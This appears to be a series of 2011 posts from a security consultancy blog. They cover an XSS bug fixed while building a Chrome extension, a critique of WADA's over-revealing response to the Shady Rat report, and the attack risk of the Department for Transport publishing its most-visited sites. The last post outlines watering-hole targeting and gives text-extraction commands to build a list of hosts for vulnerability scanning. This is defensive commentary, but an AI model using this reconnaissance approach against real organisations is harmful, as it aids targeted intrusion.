  • Testing: ~8 hours (across multiple versions of Chrome / OSs on multiple sites)
  • Bug fixing: ~ 3 hours
  • User interface: ~4 hours
  • Re-factoring because of security issue (see below): ~2 hours
  • Reporting bugs to Google: ~1 hour
  • Packaging, screen-shots and release: ~1 hour
The funny
While we were writing this extension we fell afoul of a security issue (which our SDLC code review caught before release), which is always amusing when you’re in the business of software security consultancy and writing security software. The root cause was that we were using innerHTML instead of innerText when building the results DOM with untrusted data. The net result is that we would have been vulnerable to Cross-Site Scripting had we shipped with it. There was a surprising amount of re-factoring required to move from innerHTML to innerText, as you end up doing a lot of DOM building. But hey, who says security is free (aka don't take short cuts)? Anyway, for those of you considering writing your own extensions we recommend you read both the Chrome extensions documentation in detail (which does warn you in numerous places) and the recent blog post by the Chromium team titled ‘Writing Extensions More Securely’.
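A simplified illustration of the bug and the fix (the helper name is hypothetical, not our actual code): assigning untrusted data via innerHTML parses it as markup, whereas innerText renders it literally, so building result rows element-by-element keeps attacker-controlled values inert.

```javascript
// UNSAFE: cell.innerHTML = value;  // value parsed as markup -> XSS risk
// SAFE:   cell.innerText = value;  // value rendered as literal text
//
// Hypothetical helper building a result row the safe way: create the
// cells and assign text, rather than concatenating an HTML string.
function addResultRow(table, name, value) {
  var row = table.insertRow(-1);
  row.insertCell(0).innerText = name;   // text assignment: never parsed
  row.insertCell(1).innerText = value;  // even '<script>' stays inert
  return row;
}
```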

The browser as the next web security tool platform
We’re pretty passionate in our belief that the browser will make a solid foundation for development- and QA-friendly web security vulnerability testing and regression tools. There are already examples of other extensions in the Chrome web store that provide a more penetration-tester-centric tool-set, which demonstrates to us that others clearly feel the same about the power of the browser. We already have our eye on a number of experimental Chrome extension APIs that, once mainlined by Google, will allow us to bring other, more powerful tool-sets to market. In the meantime we expect to further refine, polish and extend the existing extension.

Getting the extension, taking it for a spin and wrap-up
The extension is available free from the Chrome web store (23 users and counting – only several of which we suspect are our parents and siblings), please provide us feedback or feature requests.

If you want to see why we wrote this tool and the somewhat bi-polar nature of web security try running our plugin against (don't check ours out.. as err..):
Finally, we hope you found this post explaining our mindset and how we glued all the bits together informative and inspiring.

Thursday, 4 August 2011

WADA and Operation "Shady Rat"

Yesterday the World Anti-Doping Agency (WADA) issued a press release regarding the McAfee Operation Shady Rat report. Nothing in the published paper obliged WADA to make a public announcement, but in doing so they have at least recognised the analysis performed by McAfee Labs. McAfee uniquely identified 72 organisations, which it broke down into 6 sectors and 32 categories. Of those organisations, 4 were named, and of those only WADA at the time of writing (August 4th, 2011) have released a public statement. We reviewed both the statement and McAfee's white paper, performed some high-level analysis and drew some rudimentary but fair conclusions.

Information disclosure
WADA, having been named by McAfee, have done the responsible thing: acknowledged the white paper and communicated that they're looking into it. Unfortunately, that's not all they said. Their six-paragraph press release goes on to reveal information about:
  • Their current defences (they use a managed solution from ISS (IBM)).
  • A previous, apparently unrelated, security breach (in February 2008; they don't appear on McAfee's radar until August 2009).
  • Their response to a breach of their email system (they upgraded their firewalls).
  • That they escalate attacks to both national and international law enforcement agencies.
  • That their Anti-Doping Administration & Management System (ADAMS) operates on a functionally different server to their email.
  • That ADAMS is highly secure and has never been compromised.
  • That McAfee have not provided them with any information on the attack, its extent or the systems involved.
Openly disclosing information about the defences you have in place is poor security practice and, to the technically savvy reader, potentially undermines your good intentions. Although privacy of one's security operations is only a minor control, the more private you can keep your operations, the less informed an attacker will be. Information is commonly revealed anyway, through poor server configuration, vendor press releases and the like, but keeping as much of it private rather than public is solid security advice.

The statement gives away far too much information. Although essentially a public relations exercise by WADA, it would be fair to conclude that they've been poorly advised by their representatives on what they should say. The right approach is to acknowledge the white paper; say that you're taking it seriously; say that you're conducting an investigation into McAfee's analysis; and welcome their involvement without refuting their claims. Releasing a 'knee jerk' press release is in this case not the best course of action and shows a lack of preparedness.

How would we have advised WADA?
We took the WADA press release and the material released by McAfee and authored the following response. This is how WE would have done it:
"Following the release of the McAfee white paper on Operation Shady Rat, WADA can confirm that we are in dialogue with McAfee and are investigating thoroughly the reported intrusions. This includes actively working with its retained security experts pending further specific information. We have already taken steps to further bolster the operational security of our systems by working with our security technology and service providers. We will continue to work with all parties concerned to ensure an appropriate and timely response until resolved in a satisfactory manner."
Issuing a press release similar to the above would acknowledge McAfee's report while outlining, at a high level, the steps being taken to investigate the specific claims. Additionally it demonstrates, without giving specific details, that immediate reactionary and remedial actions have been taken, and thus the seriousness with which the matter is being treated.

So why only four?
The white paper details intrusions of 72 organisations. Of those 72, only four were named explicitly in the paper:
McAfee does not detail why these organisations were selected to be named; and certainly from the WADA press release the conclusion could be drawn that they didn't give their permission to be disclosed, nor were they informed in advance of the disclosure. Interestingly, even though 68% of the organisations listed were in the United States, none were named. The author believes that naming the four organisations above was warranted to "reinforce the fact that virtually everyone is falling prey to these intrusions". Naming fewer than 6% of the total organisations adds little to the weight of the white paper (the remaining 68 organisations provide an equally powerful message).

The analysis presented is relatively lightweight and comes without references, correlation with significant events along the timeline, or analysis of countries notably absent from the list. The author alludes to the fact that further analysis would be interesting, but without access to the raw data we must rely on McAfee potentially performing that analysis in the future.

Throwing stones in glass houses
Of course, it shouldn't go unnoticed that the author states:
"I am convinced that every company in every conceivable industry with significant size and valuable intellectual property and trade secrets has been compromised (or will be shortly)"
And then goes on to say:
"In fact, I divide the entire set of Fortune Global 2000 firms into two categories: those that know they've been compromised and those that don’t yet know."
Intel (the owner of McAfee) falls cleanly into both these categories, and it's also likely that McAfee security software is running within a significant portion of other organisations similarly categorised.

We don't dispute the quotes above; the threat posed to organisations is considerable, and credit should be given to McAfee Labs for not sugar-coating the information or the statistics presented.

  • Were WADA right to release a press statement? Yes.
  • How ethical were McAfee in naming some organisations and not others? Without knowing the reasons behind this it's hard to produce a definitive conclusion, however it would appear that not all organisations were treated equally.
  • Did WADA release too much information in their press release? Yes, without question. A more succinct response, concentrating on the McAfee release would have been a more appropriate announcement.
All of this goes to show that all organisations should be prepared for such disclosures. Having a pre-planned response for a variety of scenarios will ensure that messaging is clear and concise without further undermining your organisation's security. As with all reactionary events, it is also good to run a fire drill so that the organisation's response processes are well known and second nature, even if, hopefully, they are never required.

Tuesday, 2 August 2011

DfT Browsing Habits and the Impact on Security

FOI and the release
On July 29th the Department for Transport (DfT) released the list of their top 1,000 visited sites. Although there have been articles written about the list, mostly they concentrate on the sites themselves and the browsing habits of the civil servants within the department. However, it occurred to us that, whilst released under the Freedom of Information Act, the list itself presents a significant risk, not only to the DfT but to other Government sites with which there is likely to be a strong correlation of browsing habits. Whether the list was edited before release is a subject of debate, but we would expect a degree of filtering to be applied in order to remove sensitive sites (although the four sites on the Government Secure Intranet (GSI) were retained).

The increased risk
There is an increased rate of technical attacks against Government systems, particularly using browser-based or client-side attacks. Knowing the browsing habits of your intended victims provides a potential attacker with a list of sites to target and seed with malicious content, reducing an attack's footprint within the target organisation. A typical approach first requires the user to navigate to a malicious site; this is ordinarily achieved through enticement or social engineering (embedded links or terms in a targeted email, for example). By directly compromising sites the victims already visit, this additional step, and therefore the log imprint in the target environment, is avoided.

Seeding the target sites for an increased attack conversion rate is one use of the information. The servers themselves, and the logs they maintain, may also contain information which is useful to an attacker. For example, analysis of the logs contained on the published web servers, would likely reveal users who view the same content at work and at home. A work laptop or mobile device in the home environment can in some cases present a softer target for attack. If it's the same user on a different home machine, there is the potential for information gathering to inform more complex attacks against the Government department or to capture information stored outside the DfT network perimeter.

Taking the list to automation
So say an aggressor wanted to automate the analysis of these sites; how hard would it be? In short, not very. We can use the Python PDFMiner to extract the contents of the PDF like so:

pdf2txt.py -o output.txt f0007532-table.pdf

Tidy up the output a little to just get the hosts and remove some blank lines:

awk '$2 != "" {print $2}' output.txt > tidy.txt

Result? A list of host names and IP addresses, all tidied and ready for feeding into any automated analysis system looking for easy-to-exploit web application and server configuration vulnerabilities in the target sites. Given the number of sites, the range of material and the potential for vulnerabilities, the likelihood of accurate seeding of malicious content is significant.

Should the DfT have released the information? In our opinion, no. The value of the information in the public domain is relatively insignificant, beyond that of titillation of the reader (someone likes their expensive cars). The value to the attacking population is significant, both in the potential for increased accuracy of direct attacks, and in the availability of user specific data through the correlation of site access across multiple source addresses.